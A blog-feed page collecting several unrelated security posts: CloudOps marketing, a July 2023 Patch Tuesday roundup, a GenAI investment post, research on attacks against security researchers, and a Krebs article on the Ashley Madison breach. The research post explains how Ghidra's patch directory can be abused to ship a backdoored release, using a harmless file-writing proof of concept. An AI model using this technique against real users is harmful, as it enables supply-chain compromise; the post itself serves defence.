Getting More From Cloud | How to Maximize Business Value Through CloudOps Services

/0 Comments/in /by

With more businesses relying on cloud computing to streamline operations and improve scalability, enterprise leaders are adopting a cloud-first approach, combining network, performance, security, endpoint management, and support all through cloud operations, or CloudOps. CloudOps combines both IT processes and DevOps principles to ensure the smooth operation, maintenance, and optimization of a cloud-based infrastructure and its applications.

As news headlines are increasingly occupied by data breaches and new security vulnerabilities pose significant risks to businesses, CloudOps has emerged as a crucial component for ensuring the safety and integrity of cloud-based systems. In this post, learn to build and automate a strong cloud-first strategy that can help keep organizations of all sizes safe from potential cloud security risks.

Emerging CloudOps | The Next Phase of Digital Business

According to Gartner, global end user spending on public cloud services is being forecasted to grow nearly 22% totalling $597.3 billion this year. Given its prevalence, security experts are viewing cloud as the driving force behind the next phase of digital business as its role as a highly strategic platform for digital transformation and services.

While cloud usage is near universal in the modern business landscape, many deployments remain poorly architected or are assembled ad hoc. Digital trends for 2023 indicate that cloud infrastructure optimization is one of the top priorities to pay attention to. The rise of cloud is clear and enterprise leaders are working to evolve their IT, engineering and development teams to build the right cloud security management and operating strategies for their business. This is where CloudOps comes into play.

CloudOps focuses on managing and optimizing cloud-based infrastructure, applications, and services. It takes into account the unique characteristics and capabilities of cloud computing, such as elasticity, scalability, and resource virtualization.

Many businesses have relied on traditional IT operations (ITOps) practices to manage their cloud deployments. However, as the complexity of cloud infrastructure has grown, forward-thinking enterprises have moved towards specialized expertise and dedicated processes to better handle their cloud-first systems.

CloudOps combines principles from other operational models such as ITOps and DevOps and makes them applicable to a cloud-based architecture. These principles, processes, and best practices help security teams across cloud architecture, security, compliance, and IT operations to manage the overarching infrastructure. Below are some key differences that make CloudOps unique.

  • Managing & Optimizing Cloud – CloudOps focuses specifically on managing and optimizing cloud-based infrastructure, applications, and services. It takes into account the unique characteristics and capabilities of cloud computing, such as elasticity, scalability, and resource virtualization.
  • Underlying Infrastructure – While IT operations primarily deal with physical hardware and data centers, CloudOps is centered around virtualized resources and cloud service providers.
  • Security – Since cloud environments have unique security considerations, CloudOps focuses on implementing robust security measures, such as identity and access management, data encryption, and proactive threat monitoring; all specific to cloud-based systems.
  • Scalability – CloudOps offers greater flexibility compared to traditional IT operations. Cloud environments allow businesses to scale resources up or down based on demand, whereas scaling in traditional IT operations often requires additional hardware procurement and deployment.
  • Automation – CloudOps leverages automation tools and frameworks to streamline resource provisioning, configuration management, and application deployment in the cloud. This level of automation is typically more advanced and efficient compared to traditional IT operations.

Seizing Value Through CloudOps Services

As cloud technology continues to meet changing business needs, migrating from on-prem to the cloud is no longer enough to revolutionize business infrastructure. The rise of hybrid and multi-cloud structures has also multiplied the complexities and criticalities associated with the cloud.

To leverage more value from the cloud, enterprises have focused on driving cost efficiencies through shared services and flexible commercial models. Cloud-based Infrastructure-as-a-Service (IaaS), for example, plays a pivotal role in maintaining superior functionality and operational agility through automation, enabling businesses to optimize their operations.

In this context, CloudOps services have gained significant momentum. By managing software in a cloud computing environment, CloudOps ensures that enterprises are effectively harnessing the benefits of cloud-based systems. Since cloud operations services focus on optimizing performance and capacity, it validates best practices and processes that enable cloud platforms, applications, and internal data to perform optimally.

Increase Efficiency & Scalability

CloudOps optimizes resource utilization and reduces manual intervention, resulting in enhanced operational efficiency. With proactive monitoring and performance optimization, CloudOps teams can identify and resolve issues promptly, minimizing downtime and maximizing productivity.

CloudOps also enables scalability. When businesses scale their resources up or down based on demand, ensuring optimal performance without unnecessary resource allocation is key. By centralizing management and leveraging standardized practices, CloudOps streamlines operations, reduces complexity, and empowers organizations to focus on core business activities.

Cost Optimization

Cost optimization is a significant advantage of implementing CloudOps within organizations. CloudOps teams leverage automation, monitoring tools, and advanced analytics to optimize resource allocation and usage. Over time, security teams see cost savings as they continue to monitor resource consumption and apply scaling strategies based on demand. CloudOps also ensures that resources are provisioned efficiently, avoiding unnecessary expenses.

Improved Security

CloudOps plays a critical role in an enterprise’s cybersecurity strategy, keeping business-critical data safe from cloud-based security threats. CloudOps focuses on implementing robust security measures to protect sensitive data and ensuring the integrity of cloud-based systems. To do so, security teams continuously monitor the cloud environment for vulnerabilities, proactively detect and mitigate security risks, and also ensure compliance with industry regulations.

CloudOps employs various strategies and practices to secure a cloud environment effectively including:

  • Identity and Access Management (IAM) – CloudOps implements robust IAM policies to manage user identities, roles, and access privileges. This ensures that only authorized individuals can access and modify resources within the cloud environment.
  • Encryption – CloudOps utilizes encryption techniques to protect data at rest and in transit. Encryption safeguards sensitive information from unauthorized access, even if a breach occurs.
  • Regular Security Audits – CloudOps teams conduct regular security audits to identify vulnerabilities and weaknesses in the cloud infrastructure. This allows them to proactively address potential security gaps and implement necessary patches or updates.
  • Network Security – CloudOps implements network security measures such as firewalls, intrusion detection systems, and virtual private networks (VPNs) to monitor and protect the cloud environment from unauthorized access and malicious activities.
  • Incident Response Planning – CloudOps develops and maintains robust incident response plans to effectively handle security incidents. This includes defining escalation procedures, conducting drills, and implementing measures to minimize the impact of potential security breaches.
  • Compliance Management – CloudOps ensures compliance with industry-specific regulations and standards. This involves implementing controls and processes to meet data privacy requirements and maintain regulatory compliance.
  • Ongoing Monitoring and Threat Detection – CloudOps teams continuously monitor the cloud environment, employing advanced monitoring tools and technologies to detect and respond to potential security threats promptly. This includes real-time monitoring of logs, network traffic, and system activities.

Operating In The Cloud | How To Effectively Implement CloudOps

CloudOps enables organizations to focus on their core competencies by streamlining the management of their cloud environments. Security teams can follow the below key steps when implementing CloudOps best practices.

Define Your Cloud Strategy & Objectives

Begin by assessing the existing IT infrastructure, applications, and business processes. Understand the strengths, weaknesses, and limitations of the current environment, as well as all business drivers for adopting cloud technology.

Then, clearly define the objectives and expected outcomes of implementing CloudOps within the organization. Determine the specific areas of focus such as efficiency, scalability, security, or cost optimization. These definitions allow senior leadership to tie the cloud strategy to business goals and narrow down specific requirements when selecting the right cloud service provider.

Design CloudOps Processes

It is also important to develop clear processes for CloudOps that align with the organization’s goals. This can include defining resource provisioning and configuration management procedures, performance monitoring, incident response protocols, and security practices.

Implement Automation and Orchestration

Automation helps the organization to scale and grow. Teams providing CloudOps services can leverage automation and orchestration tools effectively to streamline resource provisioning, configuration, and deployment processes.

Automation increases efficiency and minimizes the risk of human error. Further, automating the provisioning and de-provisioning of cloud resources enables the organization to be more agile in the face of changing business requirements.

Leverage Infrastructure as Code (IaC)

In CloudOps, Infrastructure as Code (IaC) enables the management and provisioning of cloud infrastructure using code-based configurations. With IaC, CloudOps teams can define the desired state of the cloud infrastructure, including virtual machines, networks, storage, security settings, and other resources, using code or configuration files. This code serves as a blueprint that specifies how the infrastructure should be provisioned and configured.

By treating infrastructure as code, CloudOps practitioners can leverage version control systems to track changes, perform code reviews, and collaborate effectively. This ensures consistency and repeatability across deployments and simplifies the process of managing complex cloud environments. IaC allows for rapid infrastructure deployment and scaling, as code-based configurations can be easily replicated and applied across multiple environments.

Establish Continuous Integration & Deployment (CI/CD)

Continuous Integration and Deployment (CI/CD) focuses on automating and streamlining the software development and deployment processes within a cloud environment. Within the CloudOps framework, CI/CD pipelines can be configured to trigger automatically whenever code changes are committed to the repository. These pipelines perform a series of predefined actions, such as code compilation, testing, vulnerability scanning, and packaging. Once the code passes all the necessary tests and checks, it is deployed to the cloud environment, making it available to end-users.

This enables security teams to accelerate the delivery of software updates while maintaining high quality and reducing the risk of deployment failures. CI/CD also promotes collaboration among development, operations, and testing teams, facilitates rapid feedback cycles, and enables teams to respond quickly to changing business requirements and customer needs.

Monitor For Optimal Performance

Performance monitoring in CloudOps involves the continuous monitoring and analysis of the cloud environment to assess the performance of various resources and applications. It helps ensure optimal performance, identify potential bottlenecks or issues, and take proactive measures to maintain a high level of efficiency. CloudOps teams typically monitor for the following key areas:

  • Resources – Monitoring for cloud resources such as virtual machines, databases, storage, and network components. Monitoring metrics like CPU usage, memory utilization, network traffic, and disk I/O helps identify resource-intensive processes or potential performance degradation.
  • Application performance – Monitor the performance of applications running in the cloud environment. This involves tracking response times, latency, throughput, and error rates to identify any performance issues or anomalies.
  • Scalability – Assess the capacity of the cloud environment to handle increased workloads. Determine if the resources can scale dynamically to meet demand and identify potential limitations or constraints that may impact performance during peak periods.
  • Alerts, notifications, and historical data – Performance monitoring tools generate alerts and notifications based on predefined thresholds or anomalies. This enables CloudOps teams to receive real-time alerts about performance issues and take immediate action to mitigate potential problems. These tools also collect data over time, allowing for historical analysis and reporting. Teams can use this data to identify trends, patterns, and performance patterns, enabling those responsible for providing CloudOps services to make informed decisions about resource optimization, capacity planning, and performance improvements.

Singularity Cloud | SentinelOne’s Strategy for Securing the Cloud

SentinelOne enables organizations to protect their endpoints across all cloud environments, public, private, and hybrid, through Singularity™ Cloud. With thousands of accounts spread across multiple clouds, organizations need the right security in place for their cloud infrastructure. Singularity Cloud works by extending distributed, autonomous endpoint protection, detection, and response to compute workloads running in both public and private clouds, as well as on-prem data centers.

  • Enterprise-Grade EPP & EDR – Get full endpoint detection and response as well as container coverage in one SentinelOne agent. Singularity™ Cloud allows for complete container visibility with one agent per node and without pod instrumentation.
  • Enterprise Management & Deployment – Choose to auto-deploy Kubernetes Sentinel Agent, a component of Singularity™ Cloud to EKS, AKS, and GKE clusters, or Linux and Windows Server Sentinel Agents to AWS EC2, Azure VM, and Google Compute Engine.
  • AI-Powered Cloud Workload Protection – Behavioral AI detects unknown threats such as zero-day exploits and indicators of compromise consistent with novel ransomware and then quarantines them in real-time. Singularity Cloud protects runtime containers without container interference for Linux, Windows servers, and VMs.

Conclusion

The scalability and flexibility offered by the cloud come with inherent complexities. CloudOps addresses these challenges by providing organizations with the necessary tools and processes to monitor, manage, and optimize their cloud infrastructure. It enables businesses to streamline operations, reduce costs, and improve resource utilization while ensuring high availability and performance.

As businesses rapidly embrace cloud technology to drive innovation and scalability, leaders are prioritizing CloudOps implementation for its effective management of cloud environments. CloudOps brings a holistic approach to cloud management, combining technical expertise, automation, and best practices to optimize performance and build a long-term security posture.

As cloud technology continues to evolve, CloudOps keeps pace with the latest advancements. It embraces emerging technologies such as serverless computing, containerization, and artificial intelligence to drive innovation and unlock new possibilities. CloudOps also enables organizations to adapt quickly to changing business needs and leverage the full potential of cloud services.

SentinelOne can help organizations improve their cloud security strategy through a combination of endpoint detection and response (EDR) capability, autonomous threat hunting, and runtime solutions that can defeat cloud-based threats without compromising agility or availability. Learn more about Singularity™ Cloud by contacting us for a demo.

Singularity Cloud
Simplifying runtime detection and response of cloud VMs, containers, and Kubernetes clusters for maximum visibility, security, and agility.

Get a Demo

Apple & Microsoft Patch Tuesday, July 2023 Edition

/0 Comments/in /by

Microsoft Corp. today released software updates to quash 130 security bugs in its Windows operating systems and related software, including at least five flaws that are already seeing active exploitation. Meanwhile, Apple customers have their own zero-day woes again this month: On Monday, Apple issued (and then quickly pulled) an emergency update to fix a zero-day vulnerability that is being exploited on MacOS and iOS devices.

On July 10, Apple pushed a “Rapid Security Response” update to fix a code execution flaw in the Webkit browser component built into iOS, iPadOS, and macOS Ventura. Almost as soon as the patch went out, Apple pulled the software because it was reportedly causing problems loading certain websites. MacRumors says Apple will likely re-release the patches when the glitches have been addressed.

Launched in May, Apple’s Rapid Security Response updates are designed to address time-sensitive vulnerabilities, and this is the second month Apple has used it. July marks the sixth month this year that Apple has released updates for zero-day vulnerabilities — those that get exploited by malware or malcontents before there is an official patch available.

If you rely on Apple devices and don’t have automatic updates enabled, please take a moment to check the patch status of your various iDevices. The latest security update that includes the fix for the zero-day bug should be available in iOS/iPadOS 16.5.1, macOS 13.4.1, and Safari 16.5.2.

On the Windows side, there are at least four vulnerabilities patched this month that earned high CVSS (badness) scores and that are already being exploited in active attacks, according to Microsoft. They include CVE-2023-32049, which is a hole in Windows SmartScreen that lets malware bypass security warning prompts; and CVE-2023-35311 allows attackers to bypass security features in Microsoft Outlook.

The two other zero-day threats this month for Windows are both privilege escalation flaws. CVE-2023-32046 affects a core Windows component called MSHTML, which is used by Windows and other applications, like Office, Outlook and Skype. CVE-2023-36874 is an elevation of privilege bug in the Windows Error Reporting Service.

Many security experts expected Microsoft to address a fifth zero-day flaw — CVE-2023-36884 — a remote code execution weakness in Office and Windows.

“Surprisingly, there is no patch yet for one of the five zero-day vulnerabilities,” said Adam Barnett, lead software engineer at Rapid7. “Microsoft is actively investigating publicly disclosed vulnerability, and promises to update the advisory as soon as further guidance is available.”

Barnett notes that Microsoft links exploitation of this vulnerability with Storm-0978, the software giant’s name for a cybercriminal group based out of Russia that is identified by the broader security community as RomCom.

“Exploitation of CVE-2023-36884 may lead to installation of the eponymous RomCom trojan or other malware,” Barnett said. “[Microsoft] suggests that RomCom / Storm-0978 is operating in support of Russian intelligence operations. The same threat actor has also been associated with ransomware attacks targeting a wide array of victims.”

Microsoft’s advisory on CVE-2023-36884 is pretty sparse, but it does include a Windows registry hack that should help mitigate attacks on this vulnerability. Microsoft has also published a blog post about phishing campaigns tied to Storm-0978 and to the exploitation of this flaw.

Barnett said it’s while it’s possible that a patch will be issued as part of next month’s Patch Tuesday, Microsoft Office is deployed just about everywhere, and this threat actor is making waves.

“Admins should be ready for an out-of-cycle security update for CVE-2023-36884,” he said.

Microsoft also today released new details about how it plans to address the existential threat of malware that is cryptographically signed by…wait for it….Microsoft.

In late 2022, security experts at Sophos, Trend Micro and Cisco warned that ransomware criminals were using signed, malicious drivers in an attempt to evade antivirus and endpoint detection and response (EDR) tools.

In a blog post today, Sophos’s Andrew Brandt wrote that Sophos identified 133 malicious Windows driver files that were digitally signed since April 2021, and found 100 of those were actually signed by Microsoft. Microsoft said today it is taking steps to ensure those malicious driver files can no longer run on Windows computers.

As KrebsOnSecurity noted in last month’s story on malware signing-as-a-service, code-signing certificates are supposed to help authenticate the identity of software publishers, and provide cryptographic assurance that a signed piece of software has not been altered or tampered with. Both of these qualities make stolen or ill-gotten code-signing certificates attractive to cybercriminal groups, who prize their ability to add stealth and longevity to malicious software.

Dan Goodin at Ars Technica contends that whatever Microsoft may be doing to keep maliciously signed drivers from running on Windows is being bypassed by hackers using open source software that is popular with video game cheaters.

“The software comes in the form of two software tools that are available on GitHub,” Goodin explained. “Cheaters use them to digitally sign malicious system drivers so they can modify video games in ways that give the player an unfair advantage. The drivers clear the considerable hurdle required for the cheat code to run inside the Windows kernel, the fortified layer of the operating system reserved for the most critical and sensitive functions.”

Meanwhile, researchers at Cisco’s Talos security team found multiple Chinese-speaking threat groups have repurposed the tools—one apparently called “HookSignTool” and the other “FuckCertVerifyTimeValidity.”

“Instead of using the kernel access for cheating, the threat actors use it to give their malware capabilities it wouldn’t otherwise have,” Goodin said.

For a closer look at the patches released by Microsoft today, check out the always-thorough Patch Tuesday roundup from the SANS Internet Storm Center. And it’s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: AskWoody.com usually has the lowdown on any patches that may be causing problems for Windows users.

And as ever, please consider backing up your system or at least your important documents and data before applying system updates. If you encounter any problems with these updates, please drop a note about it here in the comments.

What It Takes to be a Top Gun | GenAI & Cybersecurity

/0 Comments/in /by

We believe that generative AI has the potential to generate massive value and disrupt existing industries and applications. We are now witnessing generative AI accomplish things on a daily basis that just a short time ago did not seem possible.

Generative AI has a meaningful role to play in cybersecurity, both for the good guys and the bad ones. Our motto at SentinelOne has been to be a “Force for Good”, and we intend to be a Force for Good in bringing advanced AI capabilities into cybersecurity as well.

At SentinelOne, AI has always been at the core of what we do – many years ago we introduced static AI detection models as part of our endpoint security platform that vastly improved the ability to detect potential threats versus the previous signature based approaches used in the market up to that point. At RSA 2023, we showcased the power of using generative AI in cyber with our introduction of Purple AI, which turns every security analyst into a super analyst. Purple AI significantly increases analyst productivity by reducing layers of complexity needed in generating insights and automating their ability to take action on threats and other issues surfaced via Purple.

Cybersecurity has a jobs issue, there are simply not enough trained cybersecurity professionals to meet the needs in the market – professionals who are trained to protect your favorite application, service, financial institution, utility, etc. Thus generative AI is just what cybersecurity needs – a force multiplier for security experts, for those on the good side of the equation.

What Have We Learned about Generative AI and Cybersecurity?

So what have we learned about generative AI and cybersecurity? We’ve said before that security is a data problem, and as it turns out, generative AI is ultimately a data problem as well. ChatGPT amazed the world because it provided a highly human compatible interface to the internet’s endless catalog of data. Since then we’ve seen many companies introduce “co-pilots” on top of their existing applications in many sectors – security, CRM, content creation, HR, etc.

The rapid adoption of Generative AI and LLMs technologies brings unique challenges and opportunities to the security space that will be felt in different ways than in other segments. In particular, at the same time that security analysts are gaining access to these productivity/force-multiplying tools, so are hackers and bad actors, which will in time allow them to create and execute attacks like never before. This will make it even more critical for companies to understand and adopt their own AI-based security strategy, in order to thwart a more sophisticated generation of attacks they are likely to see in the not-too-distant future.

Today’s co-pilot AI guides often use a combination of models – from open source, independent commercial LLMs, plus a vendor’s own proprietary models. These proprietary models can be tuned and trained by data specific to that vendor, often data that is gathered by the products and services it currently offers. The tuning and training performed on this data is what makes these models relevant and functional within a particular practice. The co-pilot approaches that ultimately graduate to being a Top Gun solution in their space will bring something truly transformative to their segment.

SentinelOne believes that transformational opportunities for generative AI will be driven by offerings that leverage a corpus of data that go well beyond a single vendor’s product and span an entire area or set of areas. After all, the data and information that defines a process or practice within an industry often spans multiple products.

For example, within security, it is not uncommon for an enterprise to be using between 50-100 different security tools. Today these tools define the customer’s security strategy, operations and collectively house the majority of data relative to this. GenAI’s ability to transform cybersecurity will depend in part on utilizing as much of this data as possible to introduce new capabilities never possible within a single set of tools.

Our goal with Purple AI is to do just that: provide enterprises a way to leverage the vast amount of security data spread across their security tools to create a new superpower against the evolving threat landscape, made possible through our Singularity Security DataLake.

How Does S Ventures Fit In?

So how does S Ventures fit in? We believe generative AI will give rise to an entire new tech stack, spanning core infrastructure, tools and services, and applications. LLMs will form a foundational component of the core infrastructure stack. Given the rarity of talent, funding requirements (for training and tuning new models) and ability to execute there will be a handful of players that can build a business around LLMs, perhaps most analogous to the emergence of AWS, GCP and Azure during the cloud era.

While many of these same players are also highly relevant in generative AI and LLMs today, many enterprise customers have a strong desire to avoid vendor lock-in and for a best of breed independent vendor that can cater to its specific business needs. These customers will want to establish their own unique value proposition with AI and will care about items such as customization, privacy, security, explainability and trust.

While some – particularly smaller and mid-sized customers – may be able to utilize off the shelf models, many larger customers will need more highly custom / configured models tuned for their environment. Customers may also require an enterprise level of support or engagement from their LLM provider, while others may have the sophistication to train and tune a combination of commercial and proprietary models themselves. Like in the previous cloud era, we believe both commercial and open source models will coexist alongside each other.

S Ventures is focused on actively investing in the generative AI ecosystem. Within the LLM area, we intend to invest in a select number of independent providers that hold the most promise for bringing the transformative potential of AI to the enterprise.

As part of this we are excited about our recent investment in Cohere, a leading LLM provider. Cohere has a mission – to help enable enterprises to adopt generational AI through the use of LLMs. The company has proven its ability to deliver top performing models. They have a world class technical team, that includes experts who came from GoogleBrain, DeepMind and Meta. As well as a great business team (including former operational execs from some of the largest tech companies in the world such as Google, Amazon, Apple, and Cisco) to help execute on their enterprise strategy.

Cohere understands what enterprises need – customization, data security, quality, a cloud agnostic approach and ability to deploy both on-prem and in the cloud. Cohere’s recent partnership with Oracle is a great early example of this.

We are excited about our investment in Cohere and their strong position to be one of the winners in the generative AI space.

Analyzing Attack Opportunities Against Information Security Practitioners

/0 Comments/in /by

In partnership with vx-underground, SentinelOne recently ran its first Malware Research Challenge, in which we asked researchers across the cybersecurity community to submit previously unpublished work to showcase their talents and bring their insights to a wider audience.

Today’s post is the second in a series highlighting the best entries. Jared Stroud (@DLL_Cool_J / Arch Cloud Labs) explores the risks faced by security researchers from attacks by APTs and other threat actors through compromise of security research tools. The study includes discussion of a novel attack vector through popular open-source reverse engineering platform, Ghidra.

Background

Attacks against the Information Security research community have historically ranged from fake proof-of-concept Github repos to modifying Visual Studio project data resulting in the execution of  PowerShell commands. In recent years threat actors have begun targeting software heavily used within the Information Security community. Observed targeting techniques include directly selecting individuals of the security research community through phishing campaigns or by casting a wider opportunistic net by seeding illegal software torrents. As an industry, one’s circle of trust creates an environment where the attack surface to security practitioners is unique and wider than one may think.

Sophisticated attacks are focused on those that provide much value to the Information Security community through blog posts, Youtube Channels, and other various forms of information sharing. This article will explore some of these historical attacks along with identifying the attack surface of a researcher’s toolkit as well as defensive strategies for the community for said attacks.

Historical Targeted Attacks Against Software Used by Security Practitioners

Security Company ESET reported in 2021 that threat actors linked to DPRK backdoored IDA Pro torrents via malicious DLLs within the installation folder of IDA Pro. Arch Cloud Labs does not condone the use of pirated software, but it is likely this software was chosen due to the probability of discovering additional security research on a victim’s machine. After all, why choose IDA Pro? Other actors have backdoored popular resource-intensive video game torrents to make use of GPUs for Cryptojacking campaigns. Per ESET’s tweets, upon launching IDA Pro, a scheduled task is created which downloads an additional DLL by the name of IDA Helper to fetch and execute a remotely hosted payload for follow-on post-exploitation activity.

Abusing DLL hijacking opportunities within Windows software is nothing new, but rather demonstrates the intent of the threat actor to focus on the individuals that use IDA Pro, such as security researchers. By focusing on torrent software, the threat actor also gains the security that even if an endpoint security product flags this software as malicious, the victim themselves downloading software illegally, perhaps they’ll think it’s simply something to do with the torrent, associated crack but certainly not that they’ve been targeted by a nation-state adversary.

In 2022, Google’s Threat Analytic Group (TAG) reported a targeted phishing campaign focusing on security researchers under the guise of having known security researchers aid the attacker in finalizing a proof-of-concept exploit. This proof-of-concept exploit ultimately was a Visual Studio project which executed a PowerShell command to aid in data exfiltration of a Security Researcher’s lab environment. Numerous individuals on Twitter came forward saying they had some established contact with puppet accounts that were requesting help.

Those that seek to mentor and help one another in this industry should be applauded for their efforts, but also be wary of how this can be abused in elaborate phishing campaigns such as those reported by Google TAG. It’s unlikely that these types of attacks will slow down in the coming years, and as security practitioners understanding our tools of the trade and their associated attack surface is critical in protecting ourselves as well as our research. If one looks hard enough, the ability to use a given reverse engineering or digital forensics tool to achieve living off the land types of attacks can be found. Arch Cloud Labs analyzed how these types of attacks could be applied to other widely used software such as Ghidra to enable a threat actor to target members of the security community and will demonstrate such an attack later in this article.

Opportunistic Attacks During a CVE Crisis

Academic scholars from Leiden University recently published a paper stating that 10% of proof-of-concept exploitation repos on Github contain code meant to exfiltrate sensitive data from the targeted environment. In the event a researcher’s VM is not appropriately air-gapped or isolated to an individual project, the opportunity for sensitive data loss exists. During moments of crisis such as a high-impact vulnerability (Ex: unauthenticated RCE), defenders seek to quickly understand, assess and remediate the potential impact a given vulnerability may have in their organization. This leads to researchers publishing proof-of-concept (PoC) code on GitHub for use in the wider community.

As defenders rush to Github, this creates a “watering hole” attack scenario where independent or otherwise unknown researchers have the opportunity to name a Github repo “PoC CVE-XXXX-XXXX” to gain incoming traffic for the latest vulnerability. In 2020, Andy Gill demonstrated a perfect example of this by creating a Github repo with a bash script that would Rick Roll security researchers.

When seeking to identify whether or not a Github repo is trustworthy, how do you or your research colleagues determine this? Do you audit the code or simply look at the number of stars a repo has and think “this is probably fine”? The concept of trust in PoC-exploitation is unique to the Information Security arena as outside of commercial or well-known offensive frameworks, how often is malicious software being executed in your corporate environment intentionally? Ideally never, but a framework or risk matrix for assessing a proof-of-concept legitimacy is an area that the industry has yet to fully explore.

Identifying Attack Surface of Researcher’s Tools: Case Study Ghidra

Complex software such as Visual Studio or IDA Pro contains numerous ways to achieve code execution. Understanding the tool and how its functionality can be abused is critical to understand the paths an adversary could take to leverage research environments.

Fundamentally, treating the file formats and complex archives of build systems as ways to “live off the land” like with LOLBINs, can lead to exciting new discoveries. Today, Arch Cloud Labs is demonstrating how Ghidra, a popular Reverse Engineering tool released by the National Security Agency could be leveraged for abuse in a similar vein that IDA Pro was.

Ghidra versions are regularly released via zip files located at the official Github Repo under the releases tab here. In order to backdoor Ghidra, one simply needs to place a Java .jar file that contains the same class name as a legitimate already existing Ghidra class within the following directory of the zip file ./Ghidra/patch to have the functionality be overridden. Per the README within the Ghidra patch directory:

> This directory exists so that Ghidra releases can be patched, or overridden. Classes or jar files placed in this directory will found and loaded *before* the classes that exist in the release jar files. One exception is that classes in the Utility module can not be patched in this way. The jar files will be sorted by name before being prepended to the classpath in order to have predictable class loading between Ghidra runs. This patch directory will be the very first patch entry on the classpath such that any individual classes will be found before classes in any of the patch jar files. The class files in this directory must be in the standard java package directory structure. 

The patch directory provides the adversary a unique and low-effort opportunity to ship a zip archive to an unsuspecting researcher as a part of a phishing campaign or have a second-stage payload drop additional payloads to the patch directory. To be clear, this is not an exploit but rather abusing default functionality within the Ghidra tool.

When launching a new version of Ghidra for the first time on a machine, if an entry does not exist in the .ghidra folder within the user’s home directory, a user-agreement followed by the Help menu will be displayed by the default. By identifying which Java classes are called (Ex: Help.java), this default behavior can be abused to get code to load and execute in a guaranteed fashion if the version number for the Ghidra version in the zip file is set  to a non-existent build number (ex: build id 9999.9999). This combined functionality creates a unique opportunity for a phishing campaign. This workflow is visualized below.

Ghidra attack flow

This modified Help.java file shown below contains a simple proof-of-concept modification to echo “pwn” to /tmp/pwn.txt.

Modified Help.java
Modified Help.java

Upon modifying the Java file, and completing the build steps outlined in the Ghida build documentation, a malicious actor can then take the compiled Jar, place it in the patch directory and ship it with a Ghidra release of their choice. Alternatively, in a post-exploitation scenario, this Jar can be placed as a means of persistence when Ghidra is launched. A more sophisticated payload is left as an exercise to the reader.

Protection Against Attacks and Validation of PoCs

Nothing listed below is ground breaking or new, but they’re practices not typically applied at the individual researcher level. After all, if these mechanisms are supposed to be applied towards enterprises for securing large organizations, why not apply them to the research community as well?

Starting with assessing your threat model for your research environment will enable you to make appropriate decisions for what additional steps need to be done to protect yourself and your organization. Accidentally executing malware never results in a good day and planning your environment and associated disaster recovery plan for these events can lead you to take steps to protect yourself. In addition to a disaster recovery plan for malware analysis environments, how can the community continuously check that these safeguards in place work? Just as the industry adopts continuous vulnerability scanning for containers, code, etc., the need for auditing custom malware/offensive security research environments is critical as well.

Secure build of materials (SBOMs) have become commonplace when discussing deploying commercial software. Having the ability to identify and map given versions of plugins, tools to associated dependencies and hashes to prevent abuse can aid the research community in avoiding malicious DLLs, JARs,  plugins, etc., being placed in software distributions. As new C2 frameworks consistently are developed and adopt code from one another, the ability to track the provenance of where scripts are being derived from will help prevent maliciously modified scripts from ending up on your test system as well as provide a way to acknowledge the original author.

Finally, commercial software is cryptographically signed, why not PoCs?  PoCs hosted on Github can have git commits signed off by an individual’s PGP key. This additional level of verification can give trusted researchers a way to verify they’re publishing tools to be trusted by the wider Information Security community. Additionally, a web of trust model for GIthub where user’s vouch for a researcher’s PoCs presents an interesting possibility to be explored.

Conclusion

As attacks become increasingly complex, the tools used to dissect and reveal the inner workings of campaigns themselves will likely be targeted. Understanding how these tools can be used beyond their intended functionality is critical to identifying advanced attacks against a given organization or group. Threat modeling the environment security research is being conducted in should ultimately be done to protect the researcher and their organization. Just as these practices are applied to enterprise organizations, they should filter down to the individual researcher.

References

Top Suspect in 2015 Ashley Madison Hack Committed Suicide in 2014

/0 Comments/in /by

When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users, the company’s then-CEO Noel Biderman was quick to point the finger at an unnamed former contractor. But as a new documentary series on Hulu reveals [SPOILER ALERT!], there was just one problem with that theory: Their top suspect had killed himself more than a year before the hackers began publishing stolen user data.

The new documentary, The Ashley Madison Affair, begins airing today on Hulu in the United States and on Disney+ in the United Kingdom. The series features interviews with security experts and journalists, Ashley Madison executives, victims of the breach and jilted spouses.

The series also touches on shocking new details unearthed by KrebsOnSecurity and Jeremy Bullock, a data scientist who worked with the show’s producers at the Warner Bros. production company Wall to Wall Media. Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015.

Wall to Wall reached out in July 2022 about collaborating with Bullock after KrebsOnSecurity published A Retrospective on the 2015 Ashley Madison Breach. That piece explored how Biderman — who is Jewish — had become the target of concerted harassment campaigns by anti-Semitic and far-right groups online in the months leading up to the hack.

Whoever hacked Ashley Madison had access to all employee emails, but they only released Biderman’s messages — three years worth. Apropos of my retrospective report, Bullock found that a great many messages in Biderman’s inbox were belligerent and anti-Semitic screeds from a former Ashley Madison employee named William Brewster Harrison.

William Harrison’s employment contract with Ashley Madison parent Avid Life Media.

The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online, but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service.

There is evidence to suggest that in 2010 Harrison was directed to harass the owner of Ashleymadisonsucks.com into closing the site or selling the domain to Ashley Madison.

Ashley Madison’s parent company — Toronto-based Avid Life Media — filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner. But after being informed that Bradshaw was not subject to Canadian trademark laws, Avid Life offered to buy AshleyMadisonSucks.com for $10,000.

When Bradshaw refused to sell the domain, he and his then-girlfriend were subject to an unrelenting campaign of online harassment and blackmail. It now appears those attacks were perpetrated by Harrison, who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw, his then-girlfriend and their friends.

[As the documentary points out, the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison, which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy].

Harrison even went after Bradshaw’s lawyer and wife, listing them both on a website he created called Contact-a-CEO[.]com, which Harrison used to besmirch the name of major companies — including several past employers — all entities he believed had slighted him or his family in some way. The site also claimed to include the names, addresses and phone numbers of top CEOs.

A cached copy of Harrison’s website, contact-the-ceo.com.

An exhaustive analysis of domains registered to the various Vistomail pseudonyms used by Harrison shows he also ran Bash-a-Business[.]com, which Harrison dedicated to “all those sorry ass corporate executives out there profiting from your hard work, organs, lives, ideas, intelligence, and wallets.” Copies of the site at archive.org show it was the work of someone calling themselves “The Chaos Creator.”

